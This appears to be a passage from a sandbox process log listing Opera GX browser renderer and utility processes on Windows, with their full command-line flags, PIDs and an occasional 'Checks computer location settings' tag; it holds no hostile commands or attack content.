C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=212 --field-trial-handle=5528,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9348 /prefetch:12⤵PID:5800
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=213 --field-trial-handle=7780,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3028 /prefetch:12⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9956,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6752 /prefetch:82⤵PID:4576
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=215 --field-trial-handle=8524,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9964 /prefetch:12⤵PID:4840
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=216 --field-trial-handle=10688,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9668 /prefetch:12⤵PID:1400
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=217 --field-trial-handle=10248,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6924 /prefetch:22⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=218 --field-trial-handle=6396,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:12⤵PID:5396
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=219 --field-trial-handle=6472,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3196 /prefetch:12⤵
- Checks computer location settings
PID:1056
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=220 --field-trial-handle=2536,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=160 /prefetch:12⤵PID:2932
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=222 --field-trial-handle=6700,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:12⤵PID:3852
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=223 --field-trial-handle=160,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9796 /prefetch:12⤵
- Checks computer location settings
PID:7800
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=224 --field-trial-handle=10376,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6904 /prefetch:12⤵
- Checks computer location settings
PID:6520
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=225 --field-trial-handle=8624,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8776 /prefetch:12⤵PID:6196
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=226 --field-trial-handle=6568,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8804 /prefetch:12⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=227 --field-trial-handle=6460,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6828 /prefetch:12⤵PID:7488
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=228 --field-trial-handle=5404,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3052 /prefetch:12⤵PID:1568
-
-
